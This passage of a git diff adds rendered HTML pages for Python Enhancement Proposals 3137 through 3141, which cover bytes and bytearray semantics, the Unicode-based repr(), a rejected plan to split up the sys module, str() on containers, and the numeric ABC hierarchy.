+| PyBytes      | N/A         | bytes  b'' | bytearray bytearray(b'') |
+| PyBuffer     | buffer      | buffer     | N/A                      |
+| PyMemoryView | N/A         | memoryview | memoryview         <...> |
++--------------+-------------+------------+--------------------------+
+
+
+
+
+
+

Literal Notations

+

The b’…’ notation introduced in Python 3.0a1 returns an immutable +bytes object, whatever variation is used. To create a mutable array +of bytes, use bytearray(b’…’) or bytearray([…]). The latter form +takes a list of integers in range(256).
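For example (assuming the behaviour described here, which is what Python 3 shipped):

>>> b'abc'                  # immutable
b'abc'
>>> bytearray(b'abc')       # mutable copy
bytearray(b'abc')
>>> bytearray([104, 105])   # from integers in range(256)
bytearray(b'hi')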

+
+
+

Functionality

+
+

PEP 3118 Buffer API

+

Both bytes and bytearray implement the PEP 3118 buffer API. The bytes +type only implements read-only requests; the bytearray type allows +writable and data-locked requests as well. The element data type is +always ‘B’ (i.e. unsigned byte).

+
+
+

Constructors

+

There are five forms of constructors, applicable to both bytes and bytearray (examples follow the list):

+
    +
  • bytes(<bytes>), bytes(<bytearray>), bytearray(<bytes>), +bytearray(<bytearray>): simple copying constructors, with the +note that bytes(<bytes>) might return its (immutable) +argument, but bytearray(<bytearray>) always makes a copy.
  • +
  • bytes(<str>, <encoding>[, <errors>]), bytearray(<str>, +<encoding>[, <errors>]): encode a text string. Note that the +str.encode() method returns an immutable bytes object. The +<encoding> argument is mandatory; <errors> is optional. +<encoding> and <errors>, if given, must be str instances.
  • +
  • bytes(<memory view>), bytearray(<memory view>): construct +a bytes or bytearray object from anything that implements the PEP +3118 buffer API.
  • +
  • bytes(<iterable of ints>), bytearray(<iterable of ints>): +construct a bytes or bytearray object from a stream of integers in +range(256).
  • +
  • bytes(<int>), bytearray(<int>): construct a +zero-initialized bytes or bytearray object of a given length.
  • +
+
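A few examples of these forms, as they behave in Python 3:

>>> bytes(bytearray(b'abc'))    # copying constructor
b'abc'
>>> bytes('café', 'utf-8')      # encode a text string; the encoding is mandatory
b'caf\xc3\xa9'
>>> bytearray(range(3))         # iterable of ints in range(256)
bytearray(b'\x00\x01\x02')
>>> bytes(4)                    # zero-initialized, of the given length
b'\x00\x00\x00\x00'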
+
+

Comparisons

+

The bytes and bytearray types are comparable with each other and +orderable, so that e.g. b’abc’ == bytearray(b’abc’) < b’abd’.

+

Comparing either type to a str object for equality returns False +regardless of the contents of either operand. Ordering comparisons +with str raise TypeError. This is all conformant to the standard +rules for comparison and ordering between objects of incompatible +types.

+

(Note: in Python 3.0a1, comparing a bytes instance with a str +instance would raise TypeError, on the premise that this would catch +the occasional mistake quicker, especially in code ported from Python +2.x. However, a long discussion on the python-3000 list pointed out +so many problems with this that it is clearly a bad idea, to be rolled +back in 3.0a2 regardless of the fate of the rest of this PEP.)

+
+
+

Slicing

+

Slicing a bytes object returns a bytes object. Slicing a bytearray +object returns a bytearray object.

+

Slice assignment to a bytearray object accepts anything that +implements the PEP 3118 buffer API, or an iterable of integers in +range(256).

+
+
+

Indexing

+

Indexing bytes and bytearray returns small ints (like the bytes type in +3.0a1, and like lists or array.array(‘B’)).

+

Assignment to an item of a bytearray object accepts an int in +range(256). (To assign from a bytes sequence, use a slice +assignment.)
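A short illustration of the slicing and indexing rules together:

>>> ba = bytearray(b'hello')
>>> ba[:2]                # slicing returns the same type
bytearray(b'he')
>>> ba[0]                 # indexing returns a small int
104
>>> ba[0] = 72            # item assignment takes an int in range(256)
>>> ba[1:3] = b'EL'       # slice assignment accepts any buffer
>>> ba
bytearray(b'HELlo')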

+
+
+

Str() and Repr()

+

The str() and repr() functions return the same thing for these +objects. The repr() of a bytes object returns a b’…’ style literal. +The repr() of a bytearray returns a string of the form “bytearray(b’…’)”.

+
+
+

Operators

+

The following operators are implemented by the bytes and bytearray +types, except where mentioned:

+
    +
  • b1 + b2: concatenation. With mixed bytes/bytearray operands, +the return type is that of the first argument (this seems arbitrary +until you consider how += works).
  • +
  • b1 += b2: mutates b1 if it is a bytearray object.
  • +
  • b * n, n * b: repetition; n must be an integer.
  • +
  • b *= n: mutates b if it is a bytearray object.
  • +
  • b1 in b2, b1 not in b2: substring test; b1 can be any +object implementing the PEP 3118 buffer API.
  • +
  • i in b, i not in b: single-byte membership test; i must +be an integer (if it is a length-1 bytes array, it is considered +to be a substring test, with the same outcome).
  • +
  • len(b): the number of bytes.
  • +
  • hash(b): the hash value; only implemented by the bytes type.
  • +
+

Note that the % operator is not implemented. It does not appear +worth the complexity.
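For example (Python 3 behaviour; as a historical note, a bytes % operator was eventually added much later, in Python 3.5 by PEP 461):

>>> b'ab' + bytearray(b'cd')    # mixed concatenation: first operand's type
b'abcd'
>>> bytearray(b'ab') + b'cd'
bytearray(b'abcd')
>>> b'a' * 3                    # repetition
b'aaa'
>>> 97 in b'abc'                # single-byte membership test (ord('a') == 97)
True
>>> b'bc' in b'abc'             # substring test
True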

+
+
+

Methods

+

The following methods are implemented by bytes as well as bytearray, with +similar semantics. They accept anything that implements the PEP 3118 +buffer API for bytes arguments, and return the same type as the object +whose method is called (“self”):

+
.capitalize(), .center(), .count(), .decode(), .endswith(),
+.expandtabs(), .find(), .index(), .isalnum(), .isalpha(), .isdigit(),
+.islower(), .isspace(), .istitle(), .isupper(), .join(), .ljust(),
+.lower(), .lstrip(), .partition(), .replace(), .rfind(), .rindex(),
+.rjust(), .rpartition(), .rsplit(), .rstrip(), .split(),
+.splitlines(), .startswith(), .strip(), .swapcase(), .title(),
+.translate(), .upper(), .zfill()
+
+
+

This is exactly the set of methods present on the str type in Python +2.x, with the exclusion of .encode(). The signatures and semantics +are the same too. However, whenever character classes like letter, +whitespace, lower case are used, the ASCII definitions of these +classes are used. (The Python 2.x str type uses the definitions from +the current locale, settable through the locale module.) The +.encode() method is left out because of the more strict definitions of +encoding and decoding in Python 3000: encoding always takes a Unicode +string and returns a bytes sequence, and decoding always takes a bytes +sequence and returns a Unicode string.

+

In addition, both types implement the class method .fromhex(), +which constructs an object from a string containing hexadecimal values +(with or without spaces between the bytes).
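For example:

>>> bytes.fromhex('de ad be ef')    # spaces between bytes are allowed
b'\xde\xad\xbe\xef'
>>> bytearray.fromhex('dead')
bytearray(b'\xde\xad')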

+

The bytearray type implements these additional methods from the +MutableSequence ABC (see PEP 3119):

+
+
.extend(), .insert(), .append(), .reverse(), .pop(), .remove().
+
+
+

Bytes and the Str Type

+

Like the bytes type in Python 3.0a1, and unlike the relationship +between str and unicode in Python 2.x, attempts to mix bytes (or +bytearray) objects and str objects without specifying an encoding will +raise a TypeError exception. (However, comparing bytes/bytearray and +str objects for equality will simply return False; see the section on +Comparisons above.)

+

Conversions between bytes or bytearray objects and str objects must +always be explicit, using an encoding. There are two equivalent APIs: +str(b, <encoding>[, <errors>]) is equivalent to +b.decode(<encoding>[, <errors>]), and +bytes(s, <encoding>[, <errors>]) is equivalent to +s.encode(<encoding>[, <errors>]).
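For example, the two pairs of APIs really are interchangeable:

>>> b = bytes('é', 'utf-8')
>>> str(b, 'utf-8') == b.decode('utf-8')
True
>>> bytes('é', 'utf-8') == 'é'.encode('utf-8')
True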

+

There is one exception: we can convert from bytes (or bytearray) to str +without specifying an encoding by writing str(b). This produces +the same result as repr(b). This exception is necessary because +of the general promise that any object can be printed, and printing +is just a special case of conversion to str. There is however no +promise that printing a bytes object interprets the individual bytes +as characters (unlike in Python 2.x).

+

The str type currently implements the PEP 3118 buffer API. While this is perhaps occasionally convenient, it is also potentially confusing, because the bytes accessed via the buffer API represent a platform-dependent encoding: depending on the platform byte order and a compile-time configuration option, the encoding could be UTF-16-BE, UTF-16-LE, UTF-32-BE, or UTF-32-LE. Worse, a different implementation of the str type might completely change the bytes representation, e.g. to UTF-8, or even make it impossible to access the data as a contiguous array of bytes at all. Therefore, the PEP 3118 buffer API will be removed from the str type.

+
+
+

The basestring Type

+

The basestring type will be removed from the language. Code that +used to say isinstance(x, basestring) should be changed to use +isinstance(x, str) instead.

+
+
+

Pickling

+

Left as an exercise for the reader.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3137.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-3138/index.html new file mode 100644 index 00000000000..6dab6ab2b46 --- /dev/null +++ b/pep-3138/index.html @@ -0,0 +1,396 @@ + PEP 3138 – String representation in Python 3000 | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3138 – String representation in Python 3000

+
+
Author:
+
Atsuo Ishimoto <ishimoto at gembook.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-May-2008
+
Python-Version:
+
3.0
+
Post-History:
+
05-May-2008, 05-Jun-2008
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new string representation form for Python 3000. +In Python prior to Python 3000, the repr() built-in function converted +arbitrary objects to printable ASCII strings for debugging and +logging. For Python 3000, a wider range of characters, based on the +Unicode standard, should be considered ‘printable’.

+
+
+

Motivation

+

The current repr() converts 8-bit strings to ASCII using the following algorithm.

+
    +
  • Convert CR, LF, TAB and ‘\’ to ‘\r’, ‘\n’, ‘\t’, ‘\\’.
  • +
  • Convert other non-printable characters (0x00-0x1f, 0x7f) and non-ASCII characters (>= 0x80) to ‘\xXX’.
  • +
  • Backslash-escape quote characters (apostrophe, ‘) and add the quote +character at the beginning and the end.
  • +
+

For Unicode strings, the following additional conversions are done.

+
    +
  • Convert leading surrogate pair characters without trailing character +(0xd800-0xdbff, but not followed by 0xdc00-0xdfff) to ‘\uXXXX’.
  • +
  • Convert 16-bit characters (>= 0x100) to ‘\uXXXX’.
  • +
  • Convert 21-bit characters (>= 0x10000) and surrogate pair characters +to ‘\U00xxxxxx’.
  • +
+

This algorithm converts any string to printable ASCII, and repr() is +used as a handy and safe way to print strings for debugging or for +logging. Although all non-ASCII characters are escaped, this does not +matter when most of the string’s characters are ASCII. But for other +languages, such as Japanese where most characters in a string are not +ASCII, this is very inconvenient.

+

We can use print(aJapaneseString) to get a readable string, but we +don’t have a similar workaround for printing strings from collections +such as lists or tuples. print(listOfJapaneseStrings) uses repr() +to build the string to be printed, so the resulting strings are always +hex-escaped. Or when open(japaneseFilename) raises an exception, +the error message is something like IOError: [Errno 2] No such file +or directory: '\u65e5\u672c\u8a9e', which isn’t helpful.

+

Python 3000 has a lot of nice features for non-Latin users such as +non-ASCII identifiers, so it would be helpful if Python could also +progress in a similar way for printable output.

+

Some users might be concerned that such output will mess up their +console if they print binary data like images. But this is unlikely +to happen in practice because bytes and strings are different types in +Python 3000, so printing an image to the console won’t mess it up.

+

This issue was once discussed by Hye-Shik Chang [1], but was rejected.

+
+
+

Specification

+
    +
  • Add a new function to the Python C API int Py_UNICODE_ISPRINTABLE +(Py_UNICODE ch). This function returns 0 if repr() should escape +the Unicode character ch; otherwise it returns 1. Characters +that should be escaped are defined in the Unicode character database +as:
      +
    • Cc (Other, Control)
    • +
    • Cf (Other, Format)
    • +
    • Cs (Other, Surrogate)
    • +
    • Co (Other, Private Use)
    • +
    • Cn (Other, Not Assigned)
    • +
    • Zl (Separator, Line), refers to LINE SEPARATOR (’\u2028’).
    • +
    • Zp (Separator, Paragraph), refers to PARAGRAPH SEPARATOR +(’\u2029’).
    • +
    • Zs (Separator, Space) other than ASCII space (’\x20’). Characters +in this category should be escaped to avoid ambiguity.
    • +
    +
  • +
  • The algorithm to build repr() strings should be changed to:
      +
    • Convert CR, LF, TAB and ‘\’ to ‘\r’, ‘\n’, ‘\t’, ‘\\’.
    • +
    • Convert non-printable ASCII characters (0x00-0x1f, 0x7f) to +‘\xXX’.
    • +
    • Convert leading surrogate pair characters without trailing +character (0xd800-0xdbff, but not followed by 0xdc00-0xdfff) to +‘\uXXXX’.
    • +
    • Convert non-printable characters (Py_UNICODE_ISPRINTABLE() returns +0) to ‘\xXX’, ‘\uXXXX’ or ‘\U00xxxxxx’.
    • +
    • Backslash-escape quote characters (apostrophe, 0x27) and add a +quote character at the beginning and the end.
    • +
    +
  • +
  • Set the Unicode error-handler for sys.stderr to ‘backslashreplace’ +by default.
  • +
  • Add a new function to the Python C API PyObject *PyObject_ASCII +(PyObject *o). This function converts any python object to a +string using PyObject_Repr() and then hex-escapes all non-ASCII +characters. PyObject_ASCII() generates the same string as +PyObject_Repr() in Python 2.
  • +
  • Add a new built-in function, ascii(). This function converts +any python object to a string using repr() and then hex-escapes all +non-ASCII characters. ascii() generates the same string as +repr() in Python 2.
  • +
  • Add a '%a' string format operator. '%a' converts any python +object to a string using repr() and then hex-escapes all non-ASCII +characters. The '%a' format operator generates the same string +as '%r' in Python 2. Also, add '!a' conversion flags to the +string.format() method and add '%A' operator to the +PyUnicode_FromFormat(). They convert any object to an ASCII string +as '%a' string format operator.
  • +
  • Add an isprintable() method to the string type. +str.isprintable() returns False if repr() would escape any +character in the string; otherwise returns True. The +isprintable() method calls the Py_UNICODE_ISPRINTABLE() +function internally.
  • +
+
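A few examples of the additions above, as they behave in Python 3 (which adopted this PEP):

>>> '日本語'.isprintable()
True
>>> '\u2028'.isprintable()    # LINE SEPARATOR, category Zl
False
>>> repr('日本語')             # printable characters survive repr()
"'日本語'"
>>> ascii('日本語')            # hex-escapes all non-ASCII characters
"'\\u65e5\\u672c\\u8a9e'"
>>> '%a' % '日本語'
"'\\u65e5\\u672c\\u8a9e'"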
+
+

Rationale

+

The repr() in Python 3000 should be Unicode, not ASCII based, just +like Python 3000 strings. Also, conversion should not be affected by +the locale setting, because the locale is not necessarily the same as +the output device’s locale. For example, it is common for a daemon +process to be invoked in an ASCII setting, but writes UTF-8 to its log +files. Also, web applications might want to report the error +information in more readable form based on the HTML page’s encoding.

+

Characters not supported by the user’s console could be hex-escaped on +printing, by the Unicode encoder’s error-handler. If the +error-handler of the output file is ‘backslashreplace’, such +characters are hex-escaped without raising UnicodeEncodeError. For +example, if the default encoding is ASCII, print('Hello ¢') will +print ‘Hello \xa2’. If the encoding is ISO-8859-1, ‘Hello ¢’ will be +printed.

+

The default error-handler for sys.stdout is ‘strict’. Other applications reading the output might not understand hex-escaped characters, so unsupported characters should be trapped when writing. If unsupported characters must be escaped, the error-handler should be changed explicitly. Unlike sys.stdout, sys.stderr doesn’t raise UnicodeEncodeError by default, because the default error-handler is ‘backslashreplace’. So printing error messages containing non-ASCII characters to sys.stderr will not raise an exception. Also, information about uncaught exceptions (exception object, traceback) is printed by the interpreter without raising exceptions.

+
+

Alternate Solutions

+

To help debugging in non-Latin languages without changing repr(), +other suggestions were made.

+
    +
  • Supply a tool to print lists or dicts.

    Strings to be printed for debugging are not only contained by lists +or dicts, but also in many other types of object. File objects +contain a file name in Unicode, exception objects contain a message +in Unicode, etc. These strings should be printed in readable form +when repr()ed. It is unlikely to be possible to implement a tool to +print all possible object types.

    +
  • +
  • Use sys.displayhook and sys.excepthook.

    For interactive sessions, we can write hooks to restore hex escaped +characters to the original characters. But these hooks are called +only when printing the result of evaluating an expression entered in +an interactive Python session, and don’t work for the print() +function, for non-interactive sessions or for logging.debug("%r", +...), etc.

    +
  • +
  • Subclass sys.stdout and sys.stderr.

    It is difficult to implement a subclass to restore hex-escaped +characters since there isn’t enough information left by the time +it’s a string to undo the escaping correctly in all cases. For +example, print("\\"+"u0041") should be printed as ‘\u0041’, not +‘A’. But there is no chance to tell file objects apart.

    +
  • +
  • Make the encoding used by unicode_repr() adjustable, and make the +existing repr() the default.

    With adjustable repr(), the result of using repr() is unpredictable +and would make it impossible to write correct code involving repr(). +And if current repr() is the default, then the old convention +remains intact and users may expect ASCII strings as the result of +repr(). Third party applications or libraries could be confused +when a custom repr() function is used.

    +
  • +
+
+
+
+

Backwards Compatibility

+

Changing repr() may break some existing code, especially testing code. +Five of Python’s regression tests fail with this modification. If you +need repr() strings without non-ASCII character as Python 2, you can +use the following function.

+
def repr_ascii(obj):
+    return str(repr(obj).encode("ASCII", "backslashreplace"), "ASCII")
+
+
+

For logging or for debugging, the following code can raise +UnicodeEncodeError.

+
log = open("logfile", "w")
+log.write(repr(data))     # UnicodeEncodeError will be raised
+                          # if data contains unsupported characters.
+
+
+

To avoid exceptions being raised, you can explicitly specify the +error-handler.

+
log = open("logfile", "w", errors="backslashreplace")
+log.write(repr(data))  # Unsupported characters will be escaped.
+
+
+

For a console that uses a Unicode-based encoding, for example, en_US.utf8 or de_DE.utf8, the backslashreplace trick doesn’t work and no printable characters are escaped. This causes a problem with similar-looking characters in Western, Greek and Cyrillic languages. These languages use similar (but different) alphabets (descended from a common ancestor) and contain letters that look similar but have different character codes. For example, it is hard to distinguish Latin ‘a’, ‘e’ and ‘o’ from Cyrillic ‘а’, ‘е’ and ‘о’. (The visual representation, of course, very much depends on the fonts used, but usually these letters are almost indistinguishable.) To avoid the problem, the user can adjust the terminal encoding to get a result suitable for their environment.

+
+
+

Rejected Proposals

+
    +
  • Add encoding and errors arguments to the builtin print() function, +with defaults of sys.getfilesystemencoding() and ‘backslashreplace’.

    Complicated to implement, and in general, this is not seen as a good +idea. [2]

    +
  • +
  • Use character names to escape characters, instead of hex character +codes. For example, repr('\u03b1') can be converted to +"\N{GREEK SMALL LETTER ALPHA}".

    Using character names can be very verbose compared to hex-escape. +e.g., repr("\ufbf9") is converted to "\N{ARABIC LIGATURE +UIGHUR KIRGHIZ YEH WITH HAMZA ABOVE WITH ALEF MAKSURA ISOLATED +FORM}".

    +
  • +
  • Default error-handler of sys.stdout should be ‘backslashreplace’.

    Stuff written to stdout might be consumed by another program that +might misinterpret the \ escapes. For interactive sessions, it is +possible to make the ‘backslashreplace’ error-handler the default, +but this may add confusion of the kind “it works in interactive mode +but not when redirecting to a file”.

    +
  • +
+
+
+

Implementation

+

The author wrote a patch in http://bugs.python.org/issue2630; this was +committed to the Python 3.0 branch in revision 64138 on 06-11-2008.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3138.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-3139/index.html new file mode 100644 index 00000000000..1b7a93fef4e --- /dev/null +++ b/pep-3139/index.html @@ -0,0 +1,307 @@ + PEP 3139 – Cleaning out sys and the “interpreter” module | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3139 – Cleaning out sys and the “interpreter” module

+
+
Author:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
04-Apr-2008
+
Python-Version:
+
3.0
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

Guido’s -0.5 put an end to this PEP. See +https://mail.python.org/pipermail/python-3000/2008-April/012977.html.

+
+
+

Abstract

+

This PEP proposes a new low-level module for CPython-specific interpreter +functions in order to clean out the sys module and separate general Python +functionality from implementation details.

+
+
+

Rationale

+

The sys module currently contains functions and data that can be put into two +major groups:

+
    +
  1. Data and functions that are available in all Python implementations and deal +with the general running of a Python virtual machine.
      +
    • argv
    • +
    • byteorder
    • +
    • path, path_hooks, meta_path, path_importer_cache, and modules
    • +
    • copyright, hexversion, version, and version_info
    • +
    • displayhook, __displayhook__
    • +
    • excepthook, __excepthook__, exc_info, and exc_clear
    • +
    • exec_prefix and prefix
    • +
    • executable
    • +
    • exit
    • +
    • flags, py3kwarning, dont_write_bytecode, and warn_options
    • +
    • getfilesystemencoding
    • +
    • get/setprofile
    • +
    • get/settrace, call_tracing
    • +
    • getwindowsversion
    • +
    • maxint and maxunicode
    • +
    • platform
    • +
    • ps1 and ps2
    • +
    • stdin, stderr, stdout, __stdin__, __stderr__, __stdout__
    • +
    • tracebacklimit
    • +
    +
  2. +
  3. Data and functions that affect the CPython interpreter.
      +
    • get/setrecursionlimit
    • +
    • get/setcheckinterval
    • +
    • _getframe and _current_frame
    • +
    • getrefcount
    • +
    • get/setdlopenflags
    • +
    • settscdumps
    • +
    • api_version
    • +
    • winver
    • +
    • dllhandle
    • +
    • float_info
    • +
    • _compact_freelists
    • +
    • _clear_type_cache
    • +
    • subversion
    • +
    • builtin_module_names
    • +
    • callstats
    • +
    • intern
    • +
    +
  4. +
+

The second collection of items has been steadily increasing over the years, causing clutter in sys. Guido has even said he doesn’t recognize some of the things in it [1]!

+

Moving these items off to another module would send a clear message to +other Python implementations about what functions need and need not be +implemented.

+

It has also been proposed that the contents of types module be distributed +across the standard library [2]; the interpreter module would +provide an excellent resting place for internal types like frames and code +objects.

+
+
+

Specification

+

A new builtin module named “interpreter” (see Naming) will be added.

+

The second list of items above will be split into the stdlib as follows:

+
+
The interpreter module
    +
  • get/setrecursionlimit
  • +
  • get/setcheckinterval
  • +
  • _getframe and _current_frame
  • +
  • get/setdlopenflags
  • +
  • settscdumps
  • +
  • api_version
  • +
  • winver
  • +
  • dllhandle
  • +
  • float_info
  • +
  • _clear_type_cache
  • +
  • subversion
  • +
  • builtin_module_names
  • +
  • callstats
  • +
  • intern
  • +
+
+
The gc module:
    +
  • getrefcount
  • +
  • _compact_freelists
  • +
+
+
+
+
+

Transition Plan

+

Once implemented in 3.x, the interpreter module will be back-ported to 2.6. +Py3k warnings will be added to the sys functions it replaces.

+
+
+

Open Issues

+
+

What should move?

+
+

dont_write_bytecode

+

Some believe that the writing of bytecode is an implementation detail and should +be moved [3]. The counterargument is that all current, complete +Python implementations do write some sort of bytecode, so it is valuable to be +able to disable it. Also, if it is moved, some wish to put it in the imp +module.

+
+
+
+

Move some to imp?

+

It was noted that dont_write_bytecode or maybe builtin_module_names might fit +nicely in the imp module.

+
+
+

Naming

+

The author proposes the name “interpreter” for the new module. “pyvm” has also +been suggested [4]. The name “cpython” was well liked +[5].

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3139.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-3140/index.html new file mode 100644 index 00000000000..26ef272275e --- /dev/null +++ b/pep-3140/index.html @@ -0,0 +1,322 @@ + PEP 3140 – str(container) should call str(item), not repr(item) | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3140 – str(container) should call str(item), not repr(item)

+
+
Author:
+
Oleg Broytman <phd at phdru.name>, +Jim J. Jewett <jimjjewett at gmail.com>
+
Discussions-To:
+
Python-3000 list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
27-May-2008
+
Post-History:
+
28-May-2008
+
+
+
+
Table of Contents +
+
+

Rejection

+

Guido said this would cause too much disturbance too close to beta. See [1].

+
+
+

Abstract

+

This document discusses the advantages and disadvantages of the +current implementation of str(container). It also discusses the +pros and cons of a different approach - to call str(item) instead +of repr(item).

+
+
+

Motivation

+

Currently str(container) calls repr on items. Arguments for it:

+
    +
  • containers refuse to guess what the user wants to see on +str(container) - surroundings, delimiters, and so on;
  • +
  • repr(item) usually displays type information - apostrophes +around strings, class names, etc.
  • +
+

Arguments against:

+
    +
  • it’s illogical; str() is expected to call __str__ if it exists, +not __repr__;
  • +
  • there is no standard way to print a container’s content calling +items’ __str__, that’s inconvenient in cases where __str__ and +__repr__ return different results;
  • +
  • repr(item) sometimes does the wrong thing (it hex-escapes +non-ASCII strings, for example)
  • +
+

This PEP proposes to change how str(container) works. It is +proposed to mimic how repr(container) works except one detail - call +str on items instead of repr. This allows a user to choose +what results she wants to get - from item.__repr__ or item.__str__.

+
+
+

Current situation

+

Most container types (tuples, lists, dicts, sets, etc.) do not +implement the __str__ method, so str(container) calls +container.__repr__; and container.__repr__, once called, has no way of +knowing it was called from str, so it always calls repr on the container’s +items.

+

This behaviour has advantages and disadvantages. One advantage is +that most items are represented with type information - strings +are surrounded by apostrophes, instances may have both class name +and instance data:

+
>>> print([42, '42'])
+[42, '42']
+>>> print([Decimal('42'), datetime.now()])
+[Decimal("42"), datetime.datetime(2008, 5, 27, 19, 57, 43, 485028)]
+
+
+

The disadvantage is that __repr__ often returns technical data +(like ‘<object at address>’) or an unreadable string (a hex-escaped +string if the input is a non-ASCII string):

+
>>> print(['тест'])
+['\xd4\xc5\xd3\xd4']
+
+
+

One of the motivations for PEP 3138 is that neither repr nor str +will allow the sensible printing of dicts whose keys are non-ASCII +text strings. Now that Unicode identifiers are allowed, it +includes Python’s own attribute dicts. This also includes JSON +serialization (and caused some hoops for the json lib).

+

PEP 3138 proposes to fix this by breaking the “repr is safe ASCII” +invariant, and changing the way repr (which is used for +persistence) outputs some objects, with system-dependent failures.

+

Changing how str(container) works would allow easy debugging in +the normal case, and retain the safety of ASCII-only for the +machine-readable case. The only downside is that str(x) and +repr(x) would more often be different – but only in those cases +where the current almost-the-same version is insufficient.

+

It also seems illogical that str(container) calls repr on items +instead of str. It’s only logical to expect the following code:

+
class Test:
+    def __str__(self):
+        return "STR"
+
+    def __repr__(self):
+        return "REPR"
+
+
+test = Test()
+print(test)
+print(repr(test))
+print([test])
+print(str([test]))
+
+
+

to print:

+
STR
+REPR
+[STR]
+[STR]
+
+
+

where it actually prints:

+
STR
+REPR
+[REPR]
+[REPR]
+
+
+

It is especially illogical that print in Python 2 uses str +when called on what seems to be a tuple:

+
>>> print Decimal('42'), datetime.now()
+42 2008-05-27 20:16:22.534285
+
+
+

where on an actual tuple it prints:

+
>>> print((Decimal('42'), datetime.now()))
+(Decimal("42"), datetime.datetime(2008, 5, 27, 20, 16, 27, 937911))
+
+
+
+
+

A different approach - call str(item)

+

For example, with numbers it is often only the value that people +care about.

+
>>> print Decimal('3')
+3
+
+
+

But putting the value in a list forces users to read the type +information, exactly as if repr had been called for the benefit of +a machine:

+
>>> print [Decimal('3')]
+[Decimal("3")]
+
+
+

After this change, the type information would not clutter the str +output:

+
>>> print "%s" % [Decimal('3')]
+[3]
+>>> str([Decimal('3')])  # ==
+[3]
+
+
+

But it would still be available if desired:

+
>>> print "%r" % [Decimal('3')]
+[Decimal('3')]
+>>> repr([Decimal('3')])  # ==
+[Decimal('3')]
+
+
+

There are a number of strategies to fix the problem. The most +radical is to change __repr__ so it accepts a new parameter (flag) +meaning “called from str, so call str on items, not repr”. The +drawback of this proposal is that every __repr__ implementation +must be changed. Introspection could help a bit (inspect __repr__ +before calling it to see whether it accepts 2 or 3 parameters), but introspection +doesn’t work on classes written in C, like all built-in containers.

+

A less radical proposal is to implement __str__ methods for built-in +container types. The obvious drawback is duplication of effort - all +those __str__ and __repr__ implementations differ +in only one small detail - whether they call str or repr on items.

+

The most conservative proposal is not to change str at all but +to allow developers to implement their own application- or +library-specific pretty-printers. The drawback is again +a multiplication of effort and proliferation of many small +specific container-traversal algorithms.

+
+
+
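For example, such a library-specific pretty-printer can be very small +(a hypothetical sketch; the function name is invented):

+
from decimal import Decimal
+
+def str_list(items):
+    """Render a list like repr() does, but call str() on each item."""
+    return '[' + ', '.join(str(item) for item in items) + ']'
+
+print(str_list([Decimal('3'), 42]))   # prints: [3, 42]
+
+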

Backward compatibility

+

In those cases where type information is more important than +usual, it will still be possible to get the current results by +calling repr explicitly.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3140.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3141/index.html b/pep-3141/index.html new file mode 100644 index 00000000000..efcd852d20c --- /dev/null +++ b/pep-3141/index.html @@ -0,0 +1,667 @@ + + + + + + + + PEP 3141 – A Type Hierarchy for Numbers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3141 – A Type Hierarchy for Numbers

+
+
Author:
+
Jeffrey Yasskin <jyasskin at google.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
23-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+
25-Apr-2007, 16-May-2007, 02-Aug-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This proposal defines a hierarchy of Abstract Base Classes (ABCs) (PEP +3119) to represent number-like classes. It proposes a hierarchy of +Number :> Complex :> Real :> Rational :> Integral where A :> B +means “A is a supertype of B”. The hierarchy is inspired by Scheme’s +numeric tower [3].

+
+
+

Rationale

+

Functions that take numbers as arguments should be able to determine +the properties of those numbers, and if and when overloading based on +types is added to the language, should be overloadable based on the +types of the arguments. For example, slicing requires its arguments to +be Integrals, and the functions in the math module require +their arguments to be Real.

+
+
+

Specification

+

This PEP specifies a set of Abstract Base Classes, and suggests a +general strategy for implementing some of the methods. It uses +terminology from PEP 3119, but the hierarchy is intended to be +meaningful for any systematic method of defining sets of classes.

+

The type checks in the standard library should use these classes +instead of the concrete built-ins.

+
+
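For illustration, a check written against the ABCs rather than the +concrete built-ins might look like this (a minimal sketch using the +numbers module that implements this hierarchy):

+
from numbers import Integral, Real
+
+def nth_item(seq, n):
+    """Accept any Integral index, not just int."""
+    if not isinstance(n, Integral):
+        raise TypeError("index must be an Integral")
+    return seq[int(n)]
+
+def average(xs):
+    """Accept any mix of Reals (int, float, Fraction, ...)."""
+    assert all(isinstance(x, Real) for x in xs)
+    return sum(xs) / len(xs)
+
+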

Numeric Classes

+

We begin with a Number class to make it easy for people to be fuzzy +about what kind of number they expect. This class only helps with +overloading; it doesn’t provide any operations.

+
class Number(metaclass=ABCMeta): pass
+
+
+

Most implementations of complex numbers will be hashable, but if you +need to rely on that, you’ll have to check it explicitly: mutable +numbers are supported by this hierarchy.

+
class Complex(Number):
+    """Complex defines the operations that work on the builtin complex type.
+
+    In short, those are: conversion to complex, bool(), .real, .imag,
+    +, -, *, /, **, abs(), .conjugate(), ==, and !=.
+
+    If it is given heterogeneous arguments, and doesn't have special
+    knowledge about them, it should fall back to the builtin complex
+    type as described below.
+    """
+
+    @abstractmethod
+    def __complex__(self):
